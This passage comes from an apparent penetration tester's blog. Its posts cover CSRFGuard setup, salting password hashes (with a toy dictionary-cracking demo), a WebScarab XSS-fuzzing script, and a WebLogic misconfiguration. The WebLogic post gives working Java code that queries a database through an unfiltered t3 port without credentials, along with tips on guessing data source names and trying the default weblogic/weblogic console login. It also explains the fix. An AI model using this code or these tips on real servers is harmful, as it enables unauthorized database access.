I'm not sure if I have this completely the way they intended, but it works. </p> <p><strong>Example CSRFGuard.properties:</strong> <br /> <br /><font color="#800000">org.owasp.csrfguard.Debug=true <br />org.owasp.csrfguard.ResponseHandler=org.owasp.csrfguard.handlers.JavaScriptHandler <br />org.owasp.csrfguard.TokenName=OWASP_CSRFTOKEN <br />org.owasp.csrfguard.TokenLength=32 <br />org.owasp.csrfguard.PRNG=SHA1PRNG <br />org.owasp.csrfguard.action.class.Log=org.owasp.csrfguard.actions.Log <br />org.owasp.csrfguard.action.class.Invalidate=org.owasp.csrfguard.actions.Invalidate <br />org.owasp.csrfguard.action.class.Redirect=org.owasp.csrfguard.actions.Redirect <br />org.owasp.csrfguard.action.class.Redirect.param.ErrorPage=error.jsp <br /></font> <br />org.owasp.csrfguard.TokenName can be set to whatever you want, as long as you use the same name in your code. <br /></p> <p><strong>Example web.xml:</strong></p> <p>My web.xml. Here you define the location and name of the csrfguard.properties and the resources that you wish to protect with CSRFGuard. Here I am protecting the csrfServlet. 
</p> <p> <br /> <br /><font color="#800000"><?xml version="1.0" encoding="UTF-8"?> <br /><web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://java.sun.com/xml/ns/javaee" xmlns:web="http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd" xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd" id="WebApp_ID" version="2.5"> <br />  <display-name>CSRFTest</display-name> <br />  <welcome-file-list> <br />    <welcome-file>index.html</welcome-file> <br />    <welcome-file>index.htm</welcome-file> <br />    <welcome-file>index.jsp</welcome-file> <br />    <welcome-file>default.html</welcome-file> <br />    <welcome-file>default.htm</welcome-file> <br />    <welcome-file>default.jsp</welcome-file> <br />  </welcome-file-list> <br /><filter> <br />  <filter-name>CSRFGuard</filter-name> <br />  <filter-class>org.owasp.csrfguard.CSRFGuardFilter</filter-class> <br />    <init-param> <br />      <param-name>config</param-name> <br />      <param-value>WEB-INF/csrfguard.properties</param-value> <br />    </init-param> <br /></filter></font> </p> <p><font color="#800000"><filter-mapping> <br /> <filter-name>CSRFGuard</filter-name> <br /> <servlet-name>csrfServlet</servlet-name> <br /></filter-mapping></font> </p> <p><font color="#800000"><filter-mapping> <br /> <filter-name>CSRFGuard</filter-name> <br /> <url-pattern>*.do</url-pattern> <br /></filter-mapping></font> </p> <p><font color="#800000">  <servlet> <br />      <servlet-name>csrfServlet</servlet-name> <br />      <servlet-class>csrfServlet</servlet-class> <br />  </servlet> <br />  <servlet-mapping> <br />      <servlet-name>csrfServlet</servlet-name> <br />      <url-pattern>/csrfServlet.do</url-pattern> <br />  </servlet-mapping> <br />  </web-app></font> <br /></p> <p><strong>Example Login Page:</strong></p> <p>My login page (kind of). This page must not be inside the CSRFGuard filter mappings defined in web.xml, or the filter would demand a token before one exists. I don't actually log in; I establish a session and store my OWASP_CSRFTOKEN in it. </p> <p> <br /><font color="#800000"><%@ page language="java" contentType="text/html; charset=ISO-8859-1" <br />    pageEncoding="ISO-8859-1"%> <br /><jsp:directive.page import="org.owasp.csrfguard.util.*"/> <br /><jsp:directive.page import="javax.servlet.http.*"/></font> </p> <p><font color="#800000"><%@ page session="true" %></font> </p> <p><font color="#800000"><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <br /><html> <br /><head> <br /><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <br /><title>Insert title here</title> <br /></head> <br /><body></font> </p> <p><font color="#800000"><% <br />// generate a fresh token and bind it to this session; the filter compares <br />// the OWASP_CSRFTOKEN request parameter against this session attribute <br />TokenGenerator token = new TokenGenerator(); <br />HttpSession sess = request.getSession(true); <br />String csrf = token.generateCSRFToken("SHA1PRNG",32); <br />sess.setAttribute("OWASP_CSRFTOKEN", csrf);</font> </p> <p><font color="#800000">%> <br /><a href="/CSRFTest/csrfServlet.do?OWASP_CSRFTOKEN=<%=csrf %>" > Click me to get to Protected Site </a></font> </p> <p><font color="#800000"></body> <br /></html></font> <br /></p> <p><strong>Protected Servlet:</strong> <p>Below is my <em>csrfServlet.java.</em> There is really nothing in this code 
except a message stating that you made it this far. <br /></p> </p> <p><font color="#800000">import java.io.IOException; <br />import java.io.PrintWriter; <br />import javax.servlet.*; <br />import javax.servlet.http.*;</font> </p> <p><font color="#800000">// Nothing CSRF-specific lives here: the token check happens in CSRFGuardFilter <br />// before doGet is ever called, because web.xml maps the filter onto this servlet. <br />public class csrfServlet extends HttpServlet { <br />    private static final long serialVersionUID = -6429166168752177032L;</font> </p> <p><font color="#800000">    public void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException <br /></font>    { </p> <p><font color="#800000">        response.setContentType("text/html"); <br />        PrintWriter out = response.getWriter(); <br />        out.println("<html>"); <br />        out.println("<body>"); <br />        out.println("You Made it"); <br />        out.println("</body>"); <br />        out.println("</html>"); <br />    } <br />}</font> </p> <p>Now I have a working CSRF filter. For this to work, all my links need to be dynamically generated to include OWASP_CSRFTOKEN=value as in my login page, or the token must be posted through a hidden field in a form. Prefer the hidden field for anything that changes state: a token carried in a GET query string ends up in browser history, in proxy and server access logs, and in the Referer header sent along with any off-site link or third-party resource on the protected page, which is exactly the kind of accidental disclosure the second question below is about. </p> <p>My questions now are: <br />How well will this work in a clustered environment? <br />How to ensure that the application has been carefully coded not to give up the CSRF token by accident? I'm working on a proof of concept for this one. </p> <p>Let me know if there is anyone else out there using CSRFGuard and what your experiences with it have been. </p> Unknownnoreply@blogger.com4tag:blogger.com,1999:blog-2410549130005981530.post-54786604543067071212008-05-07T15:20:00.006-05:002008-12-17T01:10:02.411-06:00Secure salt, for tasty hashesThere is a right way and a less secure way to salt. I have heard all kinds of reasons to salt, but let's be precise about what a salt buys you: it stops an attacker from reusing hashes that were precomputed without it (a hashed dictionary or a rainbow table) against your hashes. It does nothing against an attacker who knows the salt and hashes a dictionary with it. 
Some blog posts say that salting prevents rainbow table attacks outright; for a single shared salt that is inaccurate. It only rules out tables built without the salt, and once the salt is known, one table built for that salt covers every hash in the database. Consider the following. I have a salt '12345678901234567890'. I combine it with each password like this: 12345678901234567890 + <span style="font-style: italic;">password</span>. SHA-256 of that gives<span style="font-weight: bold;"> JLKyuoTkWpu1nKzx24By0G45ACAQg9XvJIAbYXT0mo8=</span>. I do the same with <span style="font-style: italic;">password2</span> and get <span style="font-weight: bold;">vwXZcCYEybvlfdm1xwOXnrXo0sWX+f634njY3SMVyaI=</span>.<br /><br />For a rainbow table to work I need to generate a large set of candidate inputs, hash them, then compare those hashes with the compromised data. If a hash matches, I return the candidate that produced it.<br />Ignore computational time and storage for the moment. Suppose I brute force the space for the table and notice the following:<br /><br /><span style="font-weight: bold;">JLKyuoTkWpu1nKzx24By0G45ACAQg9XvJIAbYXT0mo8=</span> <span style="font-style: italic;">returns </span>12345678901234567890password<br /><br />and<br /><br /><span style="font-weight: bold;">vwXZcCYEybvlfdm1xwOXnrXo0sWX+f634njY3SMVyaI=</span> <span style="font-style: italic;">returns </span>12345678901234567890password2<br /><br />After just two or three matches that share the same prefix I no longer have to search the entire N-character space: I can deduce that the salt is <span style="font-style: italic;">12345678901234567890</span>, since every recovered input begins with it. Knowing the salt, I can run dictionary attacks over salt + 'dictionary word' or enumerate salt + every alphanumeric string of the right length. In practice nobody recovers a salt this way, because the inputs above are 28 and 29 characters long; a fixed salt is usually read straight out of the application code or configuration that leaked along with the database. The end result is the same: one known salt unlocks every hash at once.<br /><br />One other point: if I could precompute the entire (salt + password) space I could also pick out false matches. If most recovered inputs begin with <span style="font-style: italic;">12345678901234567890</span> and a few do not, the few are probably collisions that I can discard, or match again to a later entry in the table.<br /><br />Now I will walk through possible hashing scenarios and what it would take to brute force them.<br /><br /><br /><br /><b>Scenario 1: Known salt, known password requirements.</b><br />Let's say I have compromised a database of SHA-1 password hashes where every password must be exactly 8 alphanumeric characters. I know the salt, so I only need to compute 62^8 = 218,340,105,584,896 hashes (see the explanation of numbers at the end of the post). On my machine it takes 2.58 seconds to calculate 1,000,000 SHA-1 hashes, so the entire space takes about 17.9 years. Sounds like a lot, but if I can recruit a botnet or a distributed computing setup, 100 machines finish in about 65 days, and every hash in the database falls with that one pass.<br /><br /><br /><b>Scenario 2: Different salt for every hash, known salt, and known password requirements. A much better way!</b><br /><br />Now, to recover one password I have to compute the entire space with that hash's own salt, and the result tells me nothing about any other hash. I assume here that the salt is public, like the username or the row's creation date: some value that is readily available from the compromised database. Using the same logic as before, I need about 65 days of the distributed system for <span style="font-weight: bold;">EACH </span>password. This is far more time consuming and therefore more secure. Be clear about what the per-hash salt does not do: a single weak password is still found by running a dictionary against that one hash in seconds. What it removes is the attacker's ability to amortize work across users, and as a side benefit two users with the same password no longer produce the same hash.<br /><br /><br /><br /><b>Scenario 3: Unique salt that is long and algorithmically calculated for every hash.</b><br /><br />Below is example code, in C#, of what I believe is a very secure hashing implementation based on Scenario 2 but with the salt algorithmically generated. I use the username to derive a value that acts as the seed to a random number generator, concatenate several of its outputs to form the salt, and prepend the salt to the password before hashing. If the algorithm that derives the salt is unknown, an attacker building a rainbow table has to cover roughly 64^45 combinations or more. Of course, if the algorithm is known then the scenario is identical to Scenario 2. The code lets you create very long salts for every password hash without storing them. Two caveats a reviewer would raise about it: XORing the bytes of an ASCII username yields a value below 128, so there are at most 128 distinct seeds and therefore at most 128 distinct salts across all users, and any two usernames with the same XOR (anagrams, for instance) share a salt; and System.Random is a statistical generator, not a cryptographic one, which matters less here only because the salt is not meant to be secret. A random per-user salt stored next to the hash avoids both problems.<br /><pre><br />using System;<br />using System.Text;<br />using System.Security.Cryptography;<br /><br />namespace crypto<br />{<br />    class Program<br />    {<br />        static void Main(string[] args)<br />        {<br />            string username = "ascetik";<br />            string clearText = "password";<br />            byte[] userBytes;<br />            string salt;<br />            byte[] saltandclear;<br />            byte[] digest;<br /><br />            // Generate the salt. This could be any algorithm you choose. I took<br />            // the username, converted it to a byte array, then XORed the bytes together.<br />            // I took the XORed result as the seed to my random number generator.<br />            // Then I used the output of the PRNG as my salt.<br />            // Caveat: ASCII bytes are all below 128, so the XOR is below 128 too.<br />            // That leaves at most 128 distinct seeds, hence at most 128 distinct<br />            // salts, and usernames that are anagrams of each other get the same salt.<br />            userBytes = ASCIIEncoding.ASCII.GetBytes(username);<br />            long XORED = 0x00;<br />            foreach (int x in userBytes)<br />                XORED = XORED ^ x;<br /><br />            // System.Random is deterministic for a given seed; that is what makes<br />            // the salt reproducible at login time without storing it.<br />            Random rand = new Random(Convert.ToInt32(XORED));<br />            salt = rand.Next().ToString();<br />            salt += rand.Next().ToString();<br />            salt += rand.Next().ToString();<br />            salt += rand.Next().ToString();<br /><br />            // prepend the salt to the clear text and convert to a byte array<br />            saltandclear = ASCIIEncoding.ASCII.GetBytes(salt + clearText);<br />            Console.Out.WriteLine("salt + password length: " + saltandclear.Length);<br /><br />            // compute the SHA-256 digest (a hash, not a ciphertext: nothing here decrypts)<br />            SHA256 sha256 = new SHA256Managed();<br />            digest = sha256.ComputeHash(saltandclear);<br /><br />            Console.Out.WriteLine(Convert.ToBase64String(digest));<br />            Console.In.ReadLine();<br />        }<br />    }<br />}<br /><br /></pre><br /><br /><br /><br /><b>Conclusion</b><br />Using a unique, algorithmically created salt for each hash can drastically improve the confidentiality of a system. A further step would be to run a mixing algorithm such as a hash over the data and feed the result in as the password to hash, or simply to hash twice; with that option, even if every hash were matched to an entry in the rainbow table, the recovered values would be intermediate results rather than passwords. The worry that iterating a hash increases the chance of collisions is negligible in practice; iterated hashing is exactly what purpose-built password hashing schemes such as PBKDF2 and bcrypt do, thousands of times over, to make every guess expensive, and they are the better choice over a home-grown construction. I'll leave the finer points to the crypto experts. 
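<br /><br />The script below is an added example written for this edit, not code from the original post, and uses a Python rendering of the post's scheme (salt prepended, then SHA-256) rather than the C# above. It runs a dictionary attack against two constructed stores of four made-up users, one sharing the static salt from the post and one with a per-user salt, and counts how many hashes the attacker has to compute in each case; it also checks the seed that the C# salt generator derives from a username. The usernames, passwords and the 16-word dictionary are constructed for the demonstration.

```python
"""Added example: amortized cracking cost under a shared salt versus a
per-user salt, plus a check of the seed the C# salt generator derives.
Not part of the original post; all user data below is constructed."""
import hashlib

# Constructed sample records: username -> password. alice and carol share a
# password on purpose, to show what a shared salt leaks before any cracking.
USERS = {
    "alice": "password",
    "bob": "letmein",
    "carol": "password",
    "dave": "dragon",
}

# Constructed attacker dictionary. Its size is what matters here, not the hit rate.
DICTIONARY = [
    "123456", "password", "letmein", "qwerty", "dragon", "monkey",
    "football", "iloveyou", "admin", "welcome", "abc123", "sunshine",
    "princess", "shadow", "master", "hello",
]

STATIC_SALT = "12345678901234567890"  # the shared salt used in the post


def sha256_hex(salt: str, password: str) -> str:
    """Hash salt + password exactly as the post does: salt prepended, SHA-256."""
    return hashlib.sha256((salt + password).encode("ascii")).hexdigest()


def store_static(users: dict) -> dict:
    """Scenario 1: every record carries the same salt."""
    return {u: (STATIC_SALT, sha256_hex(STATIC_SALT, p)) for u, p in users.items()}


def store_per_user(users: dict) -> dict:
    """Scenario 2: a salt unique to each record. As in the post's assumption the
    salt is public; here it is simply the username."""
    return {u: (u, sha256_hex(u, p)) for u, p in users.items()}


def crack(store: dict, dictionary: list) -> tuple:
    """Dictionary attack against a store of (salt, digest) records.

    Returns (recovered_passwords, hashes_computed). A lookup table is built once
    per distinct salt and reused for every record that shares it; that reuse is
    what a rainbow table gives the attacker, and what a unique salt denies."""
    tables = {}
    recovered = {}
    hashes_computed = 0
    for user, (salt, digest) in store.items():
        if salt not in tables:
            tables[salt] = {sha256_hex(salt, word): word for word in dictionary}
            hashes_computed += len(dictionary)
        if digest in tables[salt]:
            recovered[user] = tables[salt][digest]
    return recovered, hashes_computed


def shared_password_groups(store: dict) -> set:
    """Users whose stored digests are identical. With a shared salt, equal
    passwords give equal digests, so this leaks with no cracking at all."""
    by_digest = {}
    for user, (_salt, digest) in store.items():
        by_digest.setdefault(digest, []).append(user)
    return {tuple(sorted(group)) for group in by_digest.values() if len(group) > 1}


def xor_seed(username: str) -> int:
    """The seed the C# snippet derives: XOR of the username's ASCII bytes.
    Every ASCII byte is below 128, so the result is below 128 for any length."""
    seed = 0
    for b in username.encode("ascii"):
        seed ^= b
    return seed


if __name__ == "__main__":
    for label, store in (("static salt", store_static(USERS)),
                         ("per-user salt", store_per_user(USERS))):
        found, cost = crack(store, DICTIONARY)
        print(f"{label}: {len(found)} of {len(USERS)} recovered with "
              f"{cost} hashes; identical digests: {shared_password_groups(store)}")
    print("seed('ascetik') == seed('kitecsa'):",
          xor_seed("ascetik") == xor_seed("kitecsa"))
```

Running it shows the arithmetic behind Scenarios 1 and 2 at toy scale: sixteen hashes crack all four records under the shared salt, the per-user store costs sixteen hashes per user, and only the shared-salt store reveals, before any cracking, that alice and carol chose the same password. The last line shows that "ascetik" and its reverse produce the same XOR seed, and so the same salt.<br /><br />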
For now, Scenarios 2 and 3 are effective mitigations against rainbow table attacks, and they force a dictionary attack to be repeated for every hash instead of run once against all of them.<br /><br /><br /><b>Explanation of numbers:</b><br />Alpha chars = 26<br />Upper and lower case chars = 2*26 = 52<br />Numbers = 10<br />All possible alphanumeric strings of 8 chars = (52 + 10)^8<br />All possible alphanumeric strings that are exactly 8 characters in length = 62^8 = 218,340,105,584,896<br /><br /><br />Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-2410549130005981530.post-36540440576891975482008-03-03T16:47:00.003-06:002008-10-23T23:13:26.115-05:00Fun With WebLogic Connection Pools- Free database connectionsI have found a huge misconfiguration in several of the WebLogic servers that I audit. Most applications running on WebLogic use <a href="http://edocs.bea.com/wls/docs81/jdbc/programming.html"><b>database connection pools</b></a>: database connections that the WebLogic server opens and holds, and that the applications deployed on it borrow as needed. You configure the database credentials inside the WebLogic console, so the application itself never needs access to those credentials to run queries, updates, deletes, etc. 
This is good security policy in that developers never need to know the production database credentials for the app to function. It is also the root of the problem when the WebLogic server has no <a href="http://edocs.bea.com/wls/docs81/secmanage/domain.html"><b>connection filters</b></a> enabled.<br /><br /><br />WebLogic has a proprietary protocol called <a href="http://edocs.bea.com/wls/docs91/ConsoleHelp/taskhelp/channels/ConfigureT3Protocol.html"><b>t3</b></a>. An improperly configured WebLogic instance accepts t3 connections from any host, and a t3 client can look up the pooled DataSource in the server's JNDI tree and borrow one of its connections. That means you can query the database through WebLogic without ever providing database credentials: the pool supplies them. There are only three pieces of information you need to know.<br /><br /><br /><ol><li>The server name (easy to get).</li><li>The port WebLogic is listening on for t3 connections. Sometimes 7001, sometimes something else. I usually run an nmap scan of the server and then try t3 connections against the open ports until I get a proper connection, or an error that implies I have connected but my data source name is wrong (see the stack trace at the end of the post).</li><li>The data source name. This can be hard. Most apps name the data source something like AppNameDataSource; for a credit card application it could be ccDataSource, CreditCardDatasource or just Creditcard. This can take some trial and error, unless =) they have not changed the WebLogic console default username and password, weblogic/weblogic. The URL of the WebLogic console is http://yourappserver:7001/console, and the console lists every configured data source by name. If that does not yield results, fall back to the nmap scan and try ports until you find the admin console. </li></ol><br />Below is an example of creating a t3 client that connects to WebLogic and then queries the system tables in a DB2 database. You can modify the SQL to work with any database you need. 
As you can see, I never provide credentials and I still have access to the database. The null-checked close() calls in the finally block matter when you are probing: every connection you borrow and fail to return is one fewer for the real application, and an exhausted pool is an outage you caused.<br /><br /><br /><br /><br /><pre style="color: rgb(255, 0, 0);"><br /><br />import java.util.Hashtable;<br />import java.sql.Connection;<br />import java.sql.ResultSet;<br />import java.sql.Statement;<br />import javax.naming.Context;<br />import javax.naming.InitialContext;<br />import javax.sql.DataSource;<br /><br />public class DataTest<br />{<br />    public static void main(String[] args)<br />    {<br />        InitialContext ctx = null;<br />        Connection connection = null;<br />        Statement stmt = null;<br />        ResultSet rs = null;<br />        String serverName = "yourservername.com:andPort";<br />        String dataSource = "YourDataSource";<br /><br />        try<br />        {<br />            // Point the JNDI client at the WebLogic server over t3. Note that no<br />            // SECURITY_PRINCIPAL or SECURITY_CREDENTIALS are set: the lookup runs<br />            // without any principal and the pool supplies the database login.<br />            Hashtable ht = new Hashtable();<br />            ht.put(Context.INITIAL_CONTEXT_FACTORY, "weblogic.jndi.WLInitialContextFactory");<br />            ht.put(Context.PROVIDER_URL, "t3://" + serverName);<br />            ctx = new InitialContext(ht);<br />            connection = ((DataSource) ctx.lookup(dataSource)).getConnection();<br /><br />            // check for excessive permissions in DB2: can the pool's user read the catalog?<br />            String sql = "select name, creator, colcount from sysibm.systables";<br /><br />            // find the database username WebLogic is connecting with<br />            //String sql = "select user,1,1 from sysibm.sysdummy1";<br /><br />            // normal check, but you must know the DB owner and table name for DB2<br />            //String sql = "select col1, col2, col3 from dbowner.dbtableName";<br /><br />            stmt = connection.createStatement();<br />            rs = stmt.executeQuery(sql);<br />            while (rs.next())<br />                System.out.println(rs.getString(1) + " - " + rs.getString(2) + " - " + rs.getString(3));<br />        }<br />        catch (Exception e)<br />        {<br />            e.printStackTrace();<br />        }<br />        finally<br />        {<br />            // always hand the connection back to the pool, even after an error<br />            try<br />            {<br />                if (rs != null)<br />                    rs.close();<br />                if (stmt != null)<br />                    stmt.close();<br />                if (connection != null)<br />                    connection.close();<br />                if (ctx != null)<br />                    ctx.close();<br />            }<br />            catch (Exception e)<br />            {<br />                e.printStackTrace();<br />            }<br />        }<br />    }<br />}<br /><br /></pre>Example of pulling database tables from Eclipse:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_acrzuhZS74A/R8yBQfdyxTI/AAAAAAAAA0o/G6PMnJ4W-LI/s1600-h/weblogicHack.bmp"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp1.blogger.com/_acrzuhZS74A/R8yBQfdyxTI/AAAAAAAAA0o/G6PMnJ4W-LI/s320/weblogicHack.bmp" alt="" id="BLOGGER_PHOTO_ID_5173652192266208562" border="0" /></a><br /><br />Here is an example of a useful error message from the client. It tells you that you have reached a WebLogic JNDI tree over t3 (so the host and port are right) but that the data source name you guessed does not exist. Here the invalid data source name was testSource.<br /><br /><pre><br /><br /><span style="color: rgb(255, 0, 0);">javax.naming.NameNotFoundException: Unable to resolve 'testSource'. Resolved '' [Root exception is javax.naming.NameNotFoundException: Unable to resolve 'testSource'. 
Resolved '']; remaining name 'testSource'</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.rjvm.BasicOutboundRequest.sendReceive(BasicOutboundRequest.java:108)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.rmi.cluster.ReplicaAwareRemoteRef.invoke(ReplicaAwareRemoteRef.java:290)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.rmi.cluster.ReplicaAwareRemoteRef.invoke(ReplicaAwareRemoteRef.java:247)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.jndi.internal.ServerNamingNode_814_WLStub.lookup(Unknown Source)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.jndi.internal.WLContextImpl.lookup(WLContextImpl.java:371)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.jndi.internal.WLContextImpl.lookup(WLContextImpl.java:359)</span><br /><span style="color: rgb(255, 0, 0);"> at javax.naming.InitialContext.lookup(Unknown Source)</span><br /><span style="color: rgb(255, 0, 0);"> at DataTest.main(DataTest.java:35)</span><br /><span style="color: rgb(255, 0, 0);">Caused by: javax.naming.NameNotFoundException: Unable to resolve 'testSource'. 
Resolved ''</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.jndi.internal.BasicNamingNode.newNameNotFoundException(BasicNamingNode.java:1139)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.jndi.internal.BasicNamingNode.lookupHere(BasicNamingNode.java:252)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.jndi.internal.ServerNamingNode.lookupHere(ServerNamingNode.java:171)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.jndi.internal.BasicNamingNode.lookup(BasicNamingNode.java:206)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.jndi.internal.RootNamingNode_WLSkel.invoke(Unknown Source)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.rmi.internal.BasicServerRef.invoke(BasicServerRef.java:548)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.rmi.cluster.ClusterableServerRef.invoke(ClusterableServerRef.java:224)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.rmi.internal.BasicServerRef$1.run(BasicServerRef.java:438)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.security.acl.internal.AuthenticatedSubject.doAs(AuthenticatedSubject.java:363)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.security.service.SecurityManager.runAs(SecurityManager.java:147)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.rmi.internal.BasicServerRef.handleRequest(BasicServerRef.java:434)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.rmi.internal.BasicServerRef.access$300(BasicServerRef.java:57)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.rmi.internal.BasicServerRef$BasicExecuteRequest.run(BasicServerRef.java:965)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.work.ExecuteThread.execute(ExecuteThread.java:209)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.work.ExecuteThread.run(ExecuteThread.java:181)</span><br /></pre><br /><br /><br />This problem is easy to fix. 
Enable connection filters in the WebLogic console so that only the hosts that legitimately speak t3 to the server (other cluster members and the admin workstation, for example) are accepted, and keep the t3 listen port off any network that does not need it; anyone who can reach that port otherwise gets the JNDI lookup shown above for free. The filter documentation is here:<br />http://edocs.bea.com/wls/docs81/secmanage/domain.html<br /><br /><br /> <br /><br /><br />Unknownnoreply@blogger.com8tag:blogger.com,1999:blog-2410549130005981530.post-7646024848393750132007-12-09T21:36:00.000-06:002008-10-23T23:13:38.956-05:00Visio's Built in Web SpiderThere is a really great feature in Visio 2003 that is excellent for website spidering and mapping. I rarely find a need for a Microsoft product, but this one is actually very useful. If you have installed the web diagram options for Visio, you can start a web site map. As soon as you select this option you are prompted for a URL. After entering the URL, Visio spiders the entire site and creates a nice map of most areas of the site. It even shows you broken links. The only problem is that currently I don't see a way to log in to protected sites automatically, but you can click on a node in the generated diagram and start interactive mode. 
This starts a browser inside Visio that lets you log in and navigate the site while recording your movements on the Visio diagram.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_acrzuhZS74A/R1y-COZ1ZPI/AAAAAAAAAy4/HM3kzn5etH4/s1600-h/visio1.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp3.blogger.com/_acrzuhZS74A/R1y-COZ1ZPI/AAAAAAAAAy4/HM3kzn5etH4/s320/visio1.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5142193819985732850" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_acrzuhZS74A/R1y6r-Z1ZOI/AAAAAAAAAyw/p0F3ssiUsM4/s1600-h/Drawing1.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp2.blogger.com/_acrzuhZS74A/R1y6r-Z1ZOI/AAAAAAAAAyw/p0F3ssiUsM4/s320/Drawing1.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5142190139198760162" /></a><br /><br /><br />This could be very useful for both black box and white box testing. It may even uncover parts of the site you missed during your initial investigation of the audit target. 
I just started looking into it so I don't know how much it will assist me but <br /><br /><br />Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-2410549130005981530.post-1217114093862576702007-12-08T23:13:00.001-06:002008-10-23T23:13:52.864-05:00WebScarab Scripting and Fuzzing.I have been really busy and have therefore not posted in a while. Work has really consumed me, and I was studying to take the CEH (Certified Ethical Hacker) exam on Dec. 1st, which I am very proud to say I passed: I am now a Certified Ethical Hacker! Well, I have spent a lot of time working on fuzzers and ways to make my penetration testing more efficient. I have recently discovered the scripting options in WebScarab (written by Rogan Dawes) and have been trying to make some use of this feature. What I wrote is a simple script that, once an XSS payload is found reflected in a response, writes a screen scrape of that page to the file system. This way you can quickly identify which attacks worked and which did not when using the Fuzzer plugin within WebScarab. 
Here is the script:<br /><br /><pre style="color: rgb(0, 0, 153);"><br />import org.owasp.webscarab.model.Request;<br />import org.owasp.webscarab.model.Response;<br />import java.text.DateFormat;<br />import java.text.SimpleDateFormat;<br />import java.io.BufferedReader;<br />import java.io.BufferedWriter;<br />import java.io.FileReader;<br />import java.io.FileWriter;<br />import javax.swing.JOptionPane;<br /><br />// File of XSS payloads, one per line. The same file is the Fuzzer source.<br />String xssFile = "/home/ascetik/xss.txt";<br /><br />// Output file named by date and time so each hit gets its own screen scrape.<br />// HH (24-hour) rather than hh, otherwise an AM and a PM hit share a file name.<br />DateFormat df = new SimpleDateFormat("yyyyMMdd-HHmmss");<br />String date = df.format(new java.util.Date());<br />String outFile = "/home/ascetik/screenScrapes/ss-" + date + ".html";<br /><br />// The conversation's request and response, supplied by the AddConversation hook<br />Response response = conversation.getResponse();<br />Request request = conversation.getRequest();<br /><br />// Response body as a string: the screen scrape<br />byte[] hexResp = response.getContent();<br />String raw = new String(hexResp);<br /><br />// Test the response to see if any payload is echoed back verbatim.<br />// The output file is opened only when something matched, written once and<br />// closed once; otherwise every conversation would leave an empty file behind<br />// and a second match would write to an already closed stream.<br />BufferedReader xssStrings = new BufferedReader(new FileReader(xssFile));<br />String xss;<br />boolean found = false;<br />while (!found && (xss = xssStrings.readLine()) != null) {<br />    if (xss.length() > 0 && raw.indexOf(xss) != -1) {<br />        BufferedWriter bfOut = new BufferedWriter(new FileWriter(outFile));<br />        bfOut.write(raw);<br />        bfOut.close();<br />        found = true;<br />        //JOptionPane.showMessageDialog(null, "Possible XSS Found");<br />    }<br />}<br />xssStrings.close();<br /></pre><br /><br />Now let me explain. This script runs after the response is received from the server. 
I have a file called xss.txt that contains XSS payloads. I use it as the input source for the Fuzzer plugin (more on that below), and this script reads the same file to search for those strings in the server response. If a payload appears verbatim in the response there is a fairly good chance the attack was successful: at the very least the application did not encode it. It can still land in a context where it does not execute (inside a textarea, an HTML comment or a quoted JavaScript string), so confirm each hit in a browser before writing it up.<br />When one of the XSS strings is found I write an HTML file that is a screen scrape of the response; the file name looks like "ss-20071201-041504.html", which is ss + the date and time down to the second.<br /><br />To use this script you need to load it into the WebScarab framework via Tools->Script Manager at the top of the WebScarab application.<br />There you will see a tree view that displays Framework->AddConversation.<br />Click Add at the top.<br />Now every time a conversation is added to the WebScarab Summary, this script runs, as long as the checkbox next to the script in the Script Manager is selected.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_acrzuhZS74A/R1t6zuZ1ZKI/AAAAAAAAAyQ/zsjC_zLK6ug/s1600-h/Scripted+Events.png"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp0.blogger.com/_acrzuhZS74A/R1t6zuZ1ZKI/AAAAAAAAAyQ/zsjC_zLK6ug/s320/Scripted+Events.png" alt="" id="BLOGGER_PHOTO_ID_5141838428621857954" border="0" /></a><br /><br /><b>Using the Fuzzer</b><br />Once you have the above script loaded in the Script Manager, go to the Summary tab and find a conversation that you want to fuzz. You can look at the parameters column to find a fuzzable request. Right click it and select Use as fuzz template. Select the Fuzzer tab and you will see your request added there with all the parameters broken out.<br />Click Source in the middle of the Fuzzer plugin and add the same xss.txt file that is named in the script above. 
